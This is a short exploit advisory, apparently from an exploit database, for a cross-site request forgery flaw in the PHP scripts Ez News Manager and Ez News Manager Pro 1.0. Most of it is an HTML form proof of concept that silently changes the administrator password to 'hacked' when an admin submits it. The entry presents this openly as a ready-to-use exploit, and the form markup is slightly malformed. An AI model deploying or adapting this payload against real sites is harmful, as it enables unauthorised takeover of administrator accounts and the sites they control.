Ez News Manager Pro CSRF Change Admin Password vulnerability in PHP platfor
Ez News Manager / Pro CSRF Change Admin Password
[#] Application: Ez News Manager / Ez News Manager Pro
[#] Version: 1.0
[#] Platform: PHP
[#] Link[Pro]: http://www.scriptsez.net/?action=details&cat=News%20Publishing&id=2154687026
[#] Price: 15 USD
[#] Link: http://www.scriptsez.net/?action=details&cat=News%20Publishing&id=1194243816
[#] Price: 10 USD
[#] Vulnerability: XSRF Change Admin Password
Ez News Manager and Ez News Manager Pro scripts lack of cross site
request forgery protection, allowing us to make exploit to change
admin password. This exploit works with both scripts:
<form action="http://server/enmp/admin.php?action=change_password"
<input type="hidden" name="n_pwd" value="hacked">
<input type="hidden" name="new_pwd" value="hacked">
<input type="submit" name="submit" value="Submit">
# 0day.today [2018-03-14] #
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